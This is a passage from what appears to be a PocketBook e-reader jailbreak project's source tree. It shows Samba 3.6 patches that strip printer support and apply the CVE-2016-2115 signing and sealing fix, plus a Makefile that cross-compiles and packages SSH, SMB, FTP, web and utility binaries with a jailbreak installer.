166 | if (!str1 || !str2 || !p) {
167 | return False;
168 | }
169 | @@ -5026,6 +5058,10 @@ static bool api_WPrintDestEnum(struct sm
170 | union spoolss_PrinterInfo *info;
171 | uint32_t count;
172 |
173 | +#ifndef PRINTER_SUPPORT
174 | + return False;
175 | +#endif
176 | +
177 | if (!str1 || !str2 || !p) {
178 | return False;
179 | }
180 | @@ -5129,6 +5165,10 @@ static bool api_WPrintDriverEnum(struct
181 | int succnt;
182 | struct pack_desc desc;
183 |
184 | +#ifndef PRINTER_SUPPORT
185 | + return False;
186 | +#endif
187 | +
188 | if (!str1 || !str2 || !p) {
189 | return False;
190 | }
191 | @@ -5193,6 +5233,10 @@ static bool api_WPrintQProcEnum(struct s
192 | int succnt;
193 | struct pack_desc desc;
194 |
195 | +#ifndef PRINTER_SUPPORT
196 | + return False;
197 | +#endif
198 | +
199 | if (!str1 || !str2 || !p) {
200 | return False;
201 | }
202 | @@ -5257,6 +5301,10 @@ static bool api_WPrintPortEnum(struct sm
203 | int succnt;
204 | struct pack_desc desc;
205 |
206 | +#ifndef PRINTER_SUPPORT
207 | + return False;
208 | +#endif
209 | +
210 | if (!str1 || !str2 || !p) {
211 | return False;
212 | }
213 | --- a/source3/smbd/server_exit.c
214 | +++ b/source3/smbd/server_exit.c
215 | @@ -141,7 +141,9 @@ static void exit_server_common(enum serv
216 | rpc_eventlog_shutdown();
217 | rpc_ntsvcs_shutdown();
218 | rpc_svcctl_shutdown();
219 | +#ifdef PRINTER_SUPPORT
220 | rpc_spoolss_shutdown();
221 | +#endif
222 |
223 | rpc_srvsvc_shutdown();
224 | rpc_winreg_shutdown();
225 | --- a/source3/smbd/open.c
226 | +++ b/source3/smbd/open.c
227 | @@ -1608,6 +1608,9 @@ static NTSTATUS open_file_ntcreate(conne
228 | * Most of the passed parameters are ignored.
229 | */
230 |
231 | +#ifndef PRINTER_SUPPORT
232 | + return NT_STATUS_ACCESS_DENIED;
233 | +#endif
234 | if (pinfo) {
235 | *pinfo = FILE_WAS_CREATED;
236 | }
237 | --- a/source3/smbd/close.c
238 | +++ b/source3/smbd/close.c
239 | @@ -643,6 +643,9 @@ static NTSTATUS close_normal_file(struct
240 | status = ntstatus_keeperror(status, tmp);
241 |
242 | if (fsp->print_file) {
243 | +#ifndef PRINTER_SUPPORT
244 | + return NT_STATUS_OK;
245 | +#endif
246 | /* FIXME: return spool errors */
247 | print_spool_end(fsp, close_type);
248 | file_free(req, fsp);
249 | --- a/source3/smbd/fileio.c
250 | +++ b/source3/smbd/fileio.c
251 | @@ -298,6 +298,10 @@ ssize_t write_file(struct smb_request *r
252 | uint32_t t;
253 | int ret;
254 |
255 | +#ifndef PRINTER_SUPPORT
256 | + return -1;
257 | +#endif
258 | +
259 | ret = print_spool_write(fsp, data, n, pos, &t);
260 | if (ret) {
261 | errno = ret;
262 | --- a/source3/smbd/smb2_create.c
263 | +++ b/source3/smbd/smb2_create.c
264 | @@ -486,7 +486,10 @@ static struct tevent_req *smbd_smb2_crea
265 | info = FILE_WAS_OPENED;
266 | } else if (CAN_PRINT(smb1req->conn)) {
267 | status = file_new(smb1req, smb1req->conn, &result);
268 | - if(!NT_STATUS_IS_OK(status)) {
269 | +#ifdef PRINTER_SUPPORT
270 | + if(!NT_STATUS_IS_OK(status))
271 | +#endif
272 | + {
273 | tevent_req_nterror(req, status);
274 | return tevent_req_post(req, ev);
275 | }
276 | --- a/source3/rpc_server/svcctl/srv_svcctl_nt.c
277 | +++ b/source3/rpc_server/svcctl/srv_svcctl_nt.c
278 | @@ -85,9 +85,11 @@ bool init_service_op_table( void )
279 |
280 | /* add builtin services */
281 |
282 | +#ifdef PRINTER_SUPPORT
283 | svcctl_ops[i].name = talloc_strdup( svcctl_ops, "Spooler" );
284 | svcctl_ops[i].ops = &spoolss_svc_ops;
285 | i++;
286 | +#endif
287 |
288 | svcctl_ops[i].name = talloc_strdup( svcctl_ops, "NETLOGON" );
289 | svcctl_ops[i].ops = &netlogon_svc_ops;
290 | --- a/source3/librpc/rpc/rpc_common.c
291 | +++ b/source3/librpc/rpc/rpc_common.c
292 | @@ -113,9 +113,11 @@ static bool initialize_interfaces(void)
293 | if (!smb_register_ndr_interface(&ndr_table_winreg)) {
294 | return false;
295 | }
296 | +#ifdef PRINTER_SUPPORT
297 | if (!smb_register_ndr_interface(&ndr_table_spoolss)) {
298 | return false;
299 | }
300 | +#endif
301 | if (!smb_register_ndr_interface(&ndr_table_netdfs)) {
302 | return false;
303 | }
304 | --- a/source3/smbd/process.c
305 | +++ b/source3/smbd/process.c
306 | @@ -2423,8 +2423,10 @@ static bool housekeeping_fn(const struct
307 |
308 | change_to_root_user();
309 |
310 | +#ifdef PRINTER_SUPPORT
311 | /* update printer queue caches if necessary */
312 | update_monitored_printq_cache(sconn->msg_ctx);
313 | +#endif
314 |
315 | /* check if we need to reload services */
316 | check_reload(sconn, time_mono(NULL));
317 | --- a/source3/smbd/server.c
318 | +++ b/source3/smbd/server.c
319 | @@ -123,7 +123,9 @@ static void smb_pcap_updated(struct mess
320 | {
321 | struct tevent_context *ev_ctx =
322 | talloc_get_type_abort(private_data, struct tevent_context);
323 | -
324 | +#ifndef PRINTER_SUPPORT
325 | + return;
326 | +#endif
327 | DEBUG(10,("Got message saying pcap was updated. Reloading.\n"));
328 | change_to_root_user();
329 | reload_printers(ev_ctx, msg);
330 | @@ -1277,6 +1279,7 @@ extern void build_options(bool screen);
331 | * The print backend init also migrates the printing tdb's,
332 | * this requires a winreg pipe.
333 | */
334 | +#ifdef PRINTER_SUPPORT
335 | if (!print_backend_init(smbd_messaging_context()))
336 | exit(1);
337 |
338 | @@ -1315,7 +1318,7 @@ extern void build_options(bool screen);
339 | smbd_messaging_context());
340 | }
341 | }
342 | -
343 | +#endif
344 | if (!is_daemon) {
345 | /* inetd mode */
346 | TALLOC_FREE(frame);
347 |
--------------------------------------------------------------------------------
/samba-patches/026-CVE-2016-2115-v3-6.patch:
--------------------------------------------------------------------------------
1 | From 513bd34e4523e49e742487be32a7239111486a12 Mon Sep 17 00:00:00 2001
2 | From: Stefan Metzmacher
3 | Date: Sat, 27 Feb 2016 03:43:58 +0100
4 | Subject: [PATCH 1/4] CVE-2016-2115: docs-xml: add "client ipc signing" option
5 |
6 | BUG: https://bugzilla.samba.org/show_bug.cgi?id=11756
7 |
8 | Signed-off-by: Stefan Metzmacher
9 | Reviewed-by: Ralph Boehme
10 | ---
11 | docs-xml/smbdotconf/security/clientipcsigning.xml | 23 +++++++++++++++++++++++
12 | docs-xml/smbdotconf/security/clientsigning.xml | 3 +++
13 | source3/include/proto.h | 1 +
14 | source3/param/loadparm.c | 12 ++++++++++++
15 | 4 files changed, 39 insertions(+)
16 | create mode 100644 docs-xml/smbdotconf/security/clientipcsigning.xml
17 |
18 | --- /dev/null
19 | +++ b/docs-xml/smbdotconf/security/clientipcsigning.xml
20 | @@ -0,0 +1,23 @@
21 | +
26 | +
27 | + This controls whether the client is allowed or required to use SMB signing for IPC$
28 | + connections as DCERPC transport inside of winbind. Possible values
29 | + are auto, mandatory
30 | + and disabled.
31 | +
32 | +
33 | + When set to auto, SMB signing is offered, but not enforced and if set
34 | + to disabled, SMB signing is not offered either.
35 | +
36 | + Connections from winbindd to Active Directory Domain Controllers
37 | + always enforce signing.
38 | +
39 | +
40 | +client signing
41 | +
42 | +mandatory
43 | +
44 | --- a/docs-xml/smbdotconf/security/clientsigning.xml
45 | +++ b/docs-xml/smbdotconf/security/clientsigning.xml
46 | @@ -12,6 +12,9 @@
47 | When set to auto, SMB signing is offered, but not enforced.
48 | When set to mandatory, SMB signing is required and if set
49 | to disabled, SMB signing is not offered either.
50 | +
51 | + IPC$ connections for DCERPC e.g. in winbindd, are handled by the
52 | + option.
53 |
54 |
55 |
56 | --- a/source3/include/proto.h
57 | +++ b/source3/include/proto.h
58 | @@ -1690,9 +1690,11 @@ int lp_winbind_cache_time(void);
59 | int lp_winbind_reconnect_delay(void);
60 | int lp_winbind_max_clients(void);
61 | const char **lp_winbind_nss_info(void);
62 | +bool lp_winbind_sealed_pipes(void);
63 | int lp_algorithmic_rid_base(void);
64 | int lp_name_cache_timeout(void);
65 | int lp_client_signing(void);
66 | +int lp_client_ipc_signing(void);
67 | int lp_server_signing(void);
68 | int lp_client_ldap_sasl_wrapping(void);
69 | char *lp_parm_talloc_string(int snum, const char *type, const char *option, const char *def);
70 | --- a/source3/param/loadparm.c
71 | +++ b/source3/param/loadparm.c
72 | @@ -215,6 +215,7 @@ struct global {
73 | int winbind_expand_groups;
74 | bool bWinbindRefreshTickets;
75 | bool bWinbindOfflineLogon;
76 | + bool bWinbindSealedPipes;
77 | bool bWinbindNormalizeNames;
78 | bool bWinbindRpcOnly;
79 | bool bCreateKrb5Conf;
80 | @@ -366,6 +367,7 @@ struct global {
81 | int restrict_anonymous;
82 | int name_cache_timeout;
83 | int client_signing;
84 | + int client_ipc_signing;
85 | int server_signing;
86 | int client_ldap_sasl_wrapping;
87 | int iUsershareMaxShares;
88 | @@ -2319,6 +2321,15 @@ static struct parm_struct parm_table[] =
89 | .flags = FLAG_ADVANCED,
90 | },
91 | {
92 | + .label = "client ipc signing",
93 | + .type = P_ENUM,
94 | + .p_class = P_GLOBAL,
95 | + .ptr = &Globals.client_ipc_signing,
96 | + .special = NULL,
97 | + .enum_list = enum_smb_signing_vals,
98 | + .flags = FLAG_ADVANCED,
99 | + },
100 | + {
101 | .label = "server signing",
102 | .type = P_ENUM,
103 | .p_class = P_GLOBAL,
104 | @@ -4765,6 +4776,15 @@ static struct parm_struct parm_table[] =
105 | .flags = FLAG_ADVANCED,
106 | },
107 | {
108 | + .label = "winbind sealed pipes",
109 | + .type = P_BOOL,
110 | + .p_class = P_GLOBAL,
111 | + .ptr = &Globals.bWinbindSealedPipes,
112 | + .special = NULL,
113 | + .enum_list = NULL,
114 | + .flags = FLAG_ADVANCED,
115 | + },
116 | + {
117 | .label = "winbind normalize names",
118 | .type = P_BOOL,
119 | .p_class = P_GLOBAL,
120 | @@ -5458,6 +5478,7 @@ static void init_globals(bool reinit_glo
121 | Globals.szWinbindNssInfo = str_list_make_v3(NULL, "template", NULL);
122 | Globals.bWinbindRefreshTickets = False;
123 | Globals.bWinbindOfflineLogon = False;
124 | + Globals.bWinbindSealedPipes = True;
125 |
126 | Globals.iIdmapCacheTime = 86400 * 7; /* a week by default */
127 | Globals.iIdmapNegativeCacheTime = 120; /* 2 minutes by default */
128 | @@ -5470,6 +5491,7 @@ static void init_globals(bool reinit_glo
129 | Globals.bClientUseSpnego = True;
130 |
131 | Globals.client_signing = Auto;
132 | + Globals.client_ipc_signing = Required;
133 | Globals.server_signing = False;
134 |
135 | Globals.bDeferSharingViolations = True;
136 | @@ -5736,6 +5758,7 @@ FN_GLOBAL_BOOL(lp_winbind_nested_groups,
137 | FN_GLOBAL_INTEGER(lp_winbind_expand_groups, &Globals.winbind_expand_groups)
138 | FN_GLOBAL_BOOL(lp_winbind_refresh_tickets, &Globals.bWinbindRefreshTickets)
139 | FN_GLOBAL_BOOL(lp_winbind_offline_logon, &Globals.bWinbindOfflineLogon)
140 | +FN_GLOBAL_BOOL(lp_winbind_sealed_pipes, &Globals.bWinbindSealedPipes)
141 | FN_GLOBAL_BOOL(lp_winbind_normalize_names, &Globals.bWinbindNormalizeNames)
142 | FN_GLOBAL_BOOL(lp_winbind_rpc_only, &Globals.bWinbindRpcOnly)
143 | FN_GLOBAL_BOOL(lp_create_krb5_conf, &Globals.bCreateKrb5Conf)
144 | @@ -6071,6 +6094,7 @@ FN_GLOBAL_LIST(lp_winbind_nss_info, &Glo
145 | FN_GLOBAL_INTEGER(lp_algorithmic_rid_base, &Globals.AlgorithmicRidBase)
146 | FN_GLOBAL_INTEGER(lp_name_cache_timeout, &Globals.name_cache_timeout)
147 | FN_GLOBAL_INTEGER(lp_client_signing, &Globals.client_signing)
148 | +FN_GLOBAL_INTEGER(lp_client_ipc_signing, &Globals.client_ipc_signing)
149 | FN_GLOBAL_INTEGER(lp_server_signing, &Globals.server_signing)
150 | FN_GLOBAL_INTEGER(lp_client_ldap_sasl_wrapping, &Globals.client_ldap_sasl_wrapping)
151 |
152 | @@ -9700,6 +9724,20 @@ static bool lp_load_ex(const char *pszFn
153 | lp_do_parameter(GLOBAL_SECTION_SNUM, "wins server", "127.0.0.1");
154 | }
155 |
156 | + if (!lp_is_in_client()) {
157 | + switch (lp_client_ipc_signing()) {
158 | + case Required:
159 | + lp_set_cmdline("client signing", "mandatory");
160 | + break;
161 | + case Auto:
162 | + lp_set_cmdline("client signing", "auto");
163 | + break;
164 | + case False:
165 | + lp_set_cmdline("client signing", "disabled");
166 | + break;
167 | + }
168 | + }
169 | +
170 | init_iconv();
171 |
172 | bAllowIncludeRegistry = true;
173 | --- a/source3/rpc_server/spoolss/srv_spoolss_nt.c
174 | +++ b/source3/rpc_server/spoolss/srv_spoolss_nt.c
175 | @@ -2480,7 +2480,7 @@ static bool spoolss_connect_to_client(st
176 | "", /* username */
177 | "", /* domain */
178 | "", /* password */
179 | - 0, lp_client_signing());
180 | + 0, False);
181 |
182 | if ( !NT_STATUS_IS_OK( ret ) ) {
183 | DEBUG(2,("spoolss_connect_to_client: connection to [%s] failed!\n",
184 | --- /dev/null
185 | +++ b/docs-xml/smbdotconf/winbind/winbindsealedpipes.xml
186 | @@ -0,0 +1,15 @@
187 | +
191 | +
192 | + This option controls whether any requests from winbindd to domain controllers
193 | + pipe will be sealed. Disabling sealing can be useful for debugging
194 | + purposes.
195 | +
196 | + The behavior can be controlled per netbios domain
197 | + by using 'winbind sealed pipes:NETBIOSDOMAIN = no' as option.
198 | +
199 | +
200 | +yes
201 | +
202 | --- a/source3/winbindd/winbindd_cm.c
203 | +++ b/source3/winbindd/winbindd_cm.c
204 | @@ -2384,6 +2384,15 @@ NTSTATUS cm_connect_sam(struct winbindd_
205 | TALLOC_FREE(conn->samr_pipe);
206 |
207 | anonymous:
208 | + if (lp_winbind_sealed_pipes() && (IS_DC || domain->primary)) {
209 | + status = NT_STATUS_DOWNGRADE_DETECTED;
210 | + DEBUG(1, ("Unwilling to make SAMR connection to domain %s "
211 | + "without connection level security, "
212 | + "must set 'winbind sealed pipes = false' "
213 | + "to proceed: %s\n",
214 | + domain->name, nt_errstr(status)));
215 | + goto done;
216 | + }
217 |
218 | /* Finally fall back to anonymous. */
219 | status = cli_rpc_pipe_open_noauth(conn->cli, &ndr_table_samr.syntax_id,
220 | @@ -2610,6 +2619,16 @@ NTSTATUS cm_connect_lsa(struct winbindd_
221 |
222 | anonymous:
223 |
224 | + if (lp_winbind_sealed_pipes() && (IS_DC || domain->primary)) {
225 | + result = NT_STATUS_DOWNGRADE_DETECTED;
226 | + DEBUG(1, ("Unwilling to make LSA connection to domain %s "
227 | + "without connection level security, "
228 | + "must set 'winbind sealed pipes = false' "
229 | + "to proceed: %s\n",
230 | + domain->name, nt_errstr(result)));
231 | + goto done;
232 | + }
233 | +
234 | result = cli_rpc_pipe_open_noauth(conn->cli,
235 | &ndr_table_lsarpc.syntax_id,
236 | &conn->lsa_pipe);
237 | @@ -2749,7 +2768,18 @@ NTSTATUS cm_connect_netlogon(struct winb
238 |
239 | no_schannel:
240 | if ((lp_client_schannel() == False) ||
241 | - ((neg_flags & NETLOGON_NEG_SCHANNEL) == 0)) {
242 | + ((neg_flags & NETLOGON_NEG_SCHANNEL) == 0)) {
243 | + if (lp_winbind_sealed_pipes() && (IS_DC || domain->primary)) {
244 | + result = NT_STATUS_DOWNGRADE_DETECTED;
245 | + DEBUG(1, ("Unwilling to make connection to domain %s "
246 | + "without connection level security, "
247 | + "must set 'winbind sealed pipes = false' "
248 | + "to proceed: %s\n",
249 | + domain->name, nt_errstr(result)));
250 | + TALLOC_FREE(netlogon_pipe);
251 | + invalidate_cm_connection(conn);
252 | + return result;
253 | + }
254 | /*
255 | * NetSamLogonEx only works for schannel
256 | */
257 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | HOST=arm-buildroot-linux-musleabihf
2 | cc=$(HOST)-cc
3 | cc5=arm-obreey-linux-gnueabi-gcc
4 | cxx5=arm-obreey-linux-gnueabi-g++
5 | strip=$(HOST)-strip
6 | ver=$(shell git describe --tags)
7 |
8 | # These are made by the cross compiler
9 | svcbins=svc/bin/dropbear svc/bin/smbd svc/bin/ntlmhash svc/bin/proftpd svc/bin/iptables svc/bin/rsync svc/bin/lighttpd svc/bin/sftp-server svc/bin/htop svc/bin/powertop svc/bin/nano svc/bin/lftp
10 |
11 | mods=svc/etc/mod/3.10.65+
12 | proftpd=proftpd-1.3.5e
13 | iptables=iptables-1.8.3
14 | samba=samba-3.6.25
15 | rsync=rsync-3.2.3
16 | lighttpd=lighttpd-1.4.54
17 | openssh=openssh-8.1p1
18 | powertop=powertop-v2.10
19 | htop=htop-2.2.0
20 | nano=nano-4.6
21 | # TODO
22 | #openvpn=openvpn-2.4.8
23 | lftp=lftp-4.8.4
24 |
25 | common_configure=./configure --disable-ipv6 --localstatedir=/var/run --sharedstatedir=/var --host=arm-linux-gnueabi CC=$(cc) --prefix=/mnt/secure --enable-static --disable-shared LDFLAGS="--static -Wl,-gc-sections" CFLAGS="-DPUBKEY_RELAXED_PERMS=1 -DSFTPSERVER_PATH=\\\"/mnt/secure/bin/sftp-server\\\" -DDROPBEAR_PATH_SSH_PROGRAM=\\\"/mnt/secure/bin/ssh\\\" -D__mempcpy=mempcpy -ffunction-sections -fdata-sections" --prefix=/mnt/secure --sbindir=/mnt/secure/bin --datarootdir=/mnt/secure
26 |
27 | common_configure5=./configure --without-gnutls --with-openssl --disable-lz4 --disable-lzo --disable-ipv6 --localstatedir=/var/run --sharedstatedir=/var --host=arm-obreey-linux-gnueabi CC=$(cc5) CXX=$(cxx5) --prefix=/mnt/secure --disable-shared --prefix=/mnt/secure --sbindir=/mnt/secure/bin --datarootdir=/mnt/secure --disable-unicode --without-included-zlib --without-included-popt
28 |
29 | SSH_CONFIG_OPTIONS=--disable-pam --disable-syslog --disable-shadow --disable-lastlog --disable-utmp --disable-utmpx --disable-wtmp --disable-wtmpx --disable-loginfunc --disable-pututline --disable-pututxline --disable-zlib
30 |
31 | SAMBA_CONFIGURE_VARS=\
32 | ac_cv_lib_attr_getxattr=no \
33 | ac_cv_search_getxattr=no \
34 | ac_cv_file__proc_sys_kernel_core_pattern=yes \
35 | libreplace_cv_HAVE_C99_VSNPRINTF=yes \
36 | libreplace_cv_HAVE_GETADDRINFO=yes \
37 | libreplace_cv_HAVE_IFACE_IFCONF=yes \
38 | libreplace_cv_HAVE_IPV6=no \
39 | libreplace_cv_HAVE_IPV6_V6ONLY=no \
40 | LINUX_LFS_SUPPORT=yes \
41 | samba_cv_CC_NEGATIVE_ENUM_VALUES=yes \
42 | samba_cv_HAVE_GETTIMEOFDAY_TZ=yes \
43 | samba_cv_HAVE_IFACE_IFCONF=yes \
44 | samba_cv_HAVE_KERNEL_OPLOCKS_LINUX=yes \
45 | samba_cv_HAVE_SECURE_MKSTEMP=yes \
46 | samba_cv_HAVE_WRFILE_KEYTAB=no \
47 | samba_cv_USE_SETREUID=yes \
48 | samba_cv_USE_SETRESUID=yes \
49 | samba_cv_have_setreuid=yes \
50 | samba_cv_have_setresuid=yes \
51 | ac_cv_header_libunwind_h=no \
52 | ac_cv_header_zlib_h=no \
53 | samba_cv_zlib_1_2_3=no \
54 | ac_cv_path_PYTHON="" \
55 | ac_cv_path_PYTHON_CONFIG=""
56 |
57 | SAMBA_CONFIGURE_ARGS=\
58 | --disable-avahi \
59 | --disable-cups \
60 | --disable-external-libtalloc \
61 | --disable-external-libtdb \
62 | --disable-external-libtevent \
63 | --disable-pie \
64 | --disable-relro \
65 | --enable-static \
66 | --disable-swat \
67 | --disable-shared-libs \
68 | --with-codepagedir=/mnt/secure/etc/samba \
69 | --with-configdir=/mnt/secure/etc/samba \
70 | --with-included-iniparser \
71 | --with-included-popt \
72 | --with-lockdir=/var/lock \
73 | --with-logfilebase=/var/log \
74 | --with-nmbdsocketdir=/var/nmbd \
75 | --with-piddir=/var/run \
76 | --with-privatedir=/mnt/secure/etc/samba \
77 | --with-sendfile-support \
78 | --without-acl-support \
79 | --without-cluster-support \
80 | --without-ads \
81 | --without-krb5 \
82 | --without-ldap \
83 | --without-pam \
84 | --without-winbind \
85 | --without-libtdb \
86 | --without-libtalloc \
87 | --without-libnetapi \
88 | --without-libsmbclient \
89 | --without-libsmbsharemodes \
90 | --without-libtevent \
91 | --without-libaddns \
92 | --with-shared-modules=pdb_wbc_sam,idmap_nss,nss_info_template,auth_winbind,auth_wbc,auth_domain,rpc_lsarpc,rpc_samr,rpc_winreg,rpc_initshutdown,rpc_dssetup,rpc_wkssvc,rpc_svcctl,rpc_ntsvcs,rpc_netlogon,rpc_netdfs,rpc_srvsvc,rpc_spoolss,rpc_eventlog,auth_unix,auth_winbind,auth_wbc
93 |
94 | RSYNC_CONFIGURE_ARGS=\
95 | --disable-xxhash \
96 | --disable-zstd \
97 | --disable-simd
98 |
99 | # When running just "make", package the .app files and .zip release, don't bother to track dependencies for shell sript stuff.
100 | all: pbjb-$(ver).zip
101 | pbjb-$(ver).zip: Jailbreak.app Services.app
102 | zip pbjb-$(ver).zip *.app
103 | purge: clean
104 | rm -rf $(proftpd) $(samba) $(iptables) $(proftpd).tar.gz $(samba).tar.gz $(iptables).tar.bz2
105 | clean:
106 | rm -f Jailbreak.app Services.app pbjb.zip $(svcbins)
107 | make -C $(proftpd) clean || true
108 | make -C $(samba) clean || true
109 | make -C $(samba)/source3 clean || true
110 | rm -f $(samba)/auth/*.o $(samba)/source3/multi.o || true
111 | make -C $(iptables) clean || true
112 | make -C dropbear-hacks/src clean || true
113 | make -C $(htop) clean || true
114 | make -C $(openssh) clean || true
115 | make -C $(powertop) clean || true
116 | rm -rf $(mods)
117 | $(mods):
118 | make -j`nproc` -C linux-pine64 ARCH=arm CROSS_COMPILE=arm-linux-gnueabihf- modules
119 | cd linux-pine64 && ./sortmods.sh
120 | mkdir -p $(mods)
121 | cp -R linux-pine64/mod/* $(mods)
122 | su: su.c
123 | $(cc) -s -static $< -o $@
124 | jailbreak: jailbreak.c
125 | $(cc) -s -static $< -o $@
126 | Jailbreak.app: su jailbreak jailbreak-installer.sh
127 | cat jailbreak-installer.sh | sed "s/PKGVER=.*/PKGVER=$(ver)/" > Jailbreak.app
128 | tar --owner=0 --group=0 -cvzf - su jailbreak | tee Jailbreak.tgz >> Jailbreak.app
129 |
130 | ctest.app: ctest.c
131 | $(cc) -s -static $< -o $@
132 | svc/bin/suspendd: suspendd.c
133 | $(cc5) -s -linkview -Wall $< -o $@
134 |
135 | Services.app: $(mods) FORCE svc
136 | cat services-installer.sh | sed "s/PKGVER=.*/PKGVER=$(ver)/" > Services.app
137 | tar --owner=0 --group=0 -cvzf - -C svc . | tee Services.tgz >> Services.app
138 | #tar cvf test.tar -C svc .
139 |
140 | svc: $(svcbins)
141 | echo Cross-compiled service binaries
142 |
143 | # Retrieve source codes for binaries we compile statically with musl (smaller / more portable)
144 | $(openssh):
145 | wget -4 -c https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/$(openssh).tar.gz
146 | tar -xvzf $(openssh).tar.gz
147 |
148 | $(lighttpd):
149 | wget -4 -c https://download.lighttpd.net/lighttpd/releases-1.4.x/$(lighttpd).tar.gz
150 | tar -xvzf $(lighttpd).tar.gz
151 | $(proftpd):
152 | wget -4 -c ftp://ftp.proftpd.org/distrib/source/$(proftpd).tar.gz
153 | tar -xvzf $(proftpd).tar.gz
154 | $(samba):
155 | wget -4 -c https://download.samba.org/pub/samba/stable/$(samba).tar.gz
156 | tar -xvzf $(samba).tar.gz
157 | cd $(samba) && for p in ../samba-patches/*; do patch -p1 < $$p || exit 1; done
158 | $(iptables):
159 | wget -4 -c https://netfilter.org/projects/iptables/files/$(iptables).tar.bz2
160 | tar -xvjf $(iptables).tar.bz2
161 | $(rsync):
162 | wget -4 -c https://download.samba.org/pub/rsync/src/$(rsync).tar.gz
163 | tar -xvzf $(rsync).tar.gz
164 |
165 | # These depend on cc5 sdk, as they need ncurses or openssl (static musl would become too big)
166 | $(htop):
167 | wget -4 -c https://github.com/htop-dev/htop/archive/2.2.0.tar.gz -O $(htop).tar.gz
168 | tar -xvzf $(htop).tar.gz
169 | $(nano):
170 | wget -4 -c https://www.nano-editor.org/dist/v4/$(nano).tar.gz
171 | tar -xvzf $(nano).tar.gz
172 | #$(openvpn):
173 | # wget -c https://swupdate.openvpn.org/community/releases/$(openvpn).tar.gz
174 | # tar -xvzf $(openvpn).tar.gz
175 |
176 | $(powertop):
177 | wget -4 -c https://01.org/sites/default/files/downloads/$(powertop).tar.gz
178 | tar -xvzf $(powertop).tar.gz
179 | $(lftp):
180 | wget -4 -c http://lftp.yar.ru/ftp/$(lftp).tar.gz
181 | tar -xvzf $(lftp).tar.gz
182 |
183 | # each of svcbin
184 | svc/bin/dropbear: dropbear-hacks
185 | (cd dropbear-hacks/src && $(common_configure) --verbose $(SSH_CONFIG_OPTIONS))
186 | make -C dropbear-hacks/src PROGRAMS="dropbear dbclient scp" MULTI=1 STATIC=1
187 | $(strip) dropbear-hacks/src/dropbearmulti -o $@
188 |
189 | svc/bin/smbd: $(samba)
190 | (cd $(samba)/source3 && $(common_configure) $(SAMBA_CONFIGURE_VARS) $(SAMBA_CONFIGURE_ARGS) LDFLAGS="-static -Lbin -Wl,--gc-sections")
191 | make -C $(samba)/source3 MODULES= PICFLAG= DYNEXP=
192 | $(strip) $(samba)/source3/bin/samba_multicall -o $@
193 |
194 | svc/bin/ntlmhash: ntlmhash.c
195 | $(cc) -static -s $< -o $@
196 |
197 |
198 | # The following are linked with sdk (may not work on slightly older firmware)
199 | svc/bin/iptables: $(iptables)
200 | (cd $(iptables) && $(common_configure5) --disable-devel --disable-nftables --with-xt-lock-name=/var/run/xtables.lock)
201 | make -C $(iptables)
202 | $(strip) $(iptables)/iptables/xtables-legacy-multi -o $@
203 |
204 | svc/bin/proftpd: $(proftpd)
205 | (cd $(proftpd) && $(common_configure5) --disable-autoshadow --without-pic --disable-auth-pam --disable-cap --disable-facl --disable-dso --disable-trace)
206 | make -C $(proftpd)
207 | $(strip) $(proftpd)/proftpd -o $@
208 |
209 | svc/bin/rsync: $(rsync)
210 | (cd $(rsync) && $(common_configure5) $(RSYNC_CONFIGURE_ARGS) )
211 | make -C $(rsync)
212 | $(strip) $(rsync)/rsync -o $@
213 |
214 | lighty_flags=--with-pic= --without-pic --with-pcre=yes --with-openssl=yes PCRE_LIB=-lpcre SSL_LIB="-lssl -lcrypto"
215 | # --without-zlib --without-bzip2
216 | # no_build="mod_accesslog mod_compress mod_deflate mod_evhost mod_extforward mod_fastcgi mod_flv_streaming mod_proxy mod_rrdtool mod_secdownload mod_scgi mod_sockproxy mod_userdir mod_usertrack mod_vhostddb mod_wstunnel"
217 |
218 | svc/bin/lighttpd: $(lighttpd)
219 | cp -f plugin-static.h $(lighttpd)/src
220 | (cd $(lighttpd) && LIGHTTPD_STATIC=yes CPPFLAGS=-DLIGHTTPD_STATIC $(common_configure5) $(lighty_flags))
221 | make -C $(lighttpd) lighttpd_LDFLAGS="-Wl,-gc-sections"
222 | #LDFLAGS="-static" lighttpd_LDFLAGS="--static -Wl,-gc-sections"
223 | $(strip) $(lighttpd)/src/lighttpd -o $@
224 |
225 | svc/bin/htop: $(htop)
226 | (cd $(htop) && ./autogen.sh && $(common_configure5) ac_cv_lib_ncurses_refresh=yes LIBS=-lncurses HTOP_NCURSES_CONFIG_SCRIPT=/bin/false)
227 | make -C $(htop)
228 | $(strip) $(htop)/htop -o $@
229 |
230 | svc/bin/nano: $(nano)
231 | (cd $(nano) && $(common_configure5) ac_cv_lib_ncurses_refresh=yes LIBS=-lncurses HTOP_NCURSES_CONFIG_SCRIPT=/bin/false)
232 | make -C $(nano)
233 | $(strip) $(nano)/src/nano -o $@
234 |
235 | #svc/bin/openvpn: $(openvpn)
236 | # (cd $(openvpn) && $(common_configure5) --disable-plugin-auth-pam --disable-plugin-down-root)
237 | # make -C $(openvpn)
238 | # $(strip) $(openvpn)/src/openvpn/openvpn -o $@
239 |
240 |
241 | svc/bin/powertop: $(powertop)
242 | (cd $(powertop) && $(common_configure5) NCURSES_CFLAGS=" " LIBNL_CFLAGS=" " LIBNL_LIBS="-lnl -lnl-genl" ac_cv_func_malloc_0_nonnull=yes ac_cv_func_realloc_0_nonnull=yes)
243 | make -C $(powertop)
244 | $(strip) $(powertop)/src/powertop -o $@
245 |
246 | svc/bin/lftp: $(lftp)
247 | (cd $(lftp) && LIBS=-lz $(common_configure5) ac_cv_func_fallocate=no --without-zlib zlib_cv_libz=yes zlib_cv_zlib_h=yes ac_cv_header_zlib_h=yes ac_cv_lib_z_inflateEnd=yes)
248 | make -C $(lftp)
249 | $(strip) $(lftp)/src/lftp -o $@
250 |
251 | svc/bin/sftp-server: $(openssh)
252 | (cd $(openssh) && $(common_configure5))
253 | make -C $(openssh) sftp-server
254 | $(strip) $(openssh)/sftp-server -o svc/bin/sftp-server
255 |
256 | FORCE:
257 |
--------------------------------------------------------------------------------
/samba-patches/310-remove_error_strings.patch:
--------------------------------------------------------------------------------
1 | --- a/libcli/util/doserr.c
2 | +++ b/libcli/util/doserr.c
3 | @@ -28,6 +28,7 @@ struct werror_code_struct {
4 |
5 | static const struct werror_code_struct dos_errs[] =
6 | {
7 | +#ifdef VERBOSE_ERROR
8 | { "WERR_OK", WERR_OK },
9 | { "WERR_BADFILE", WERR_BADFILE },
10 | { "WERR_ACCESS_DENIED", WERR_ACCESS_DENIED },
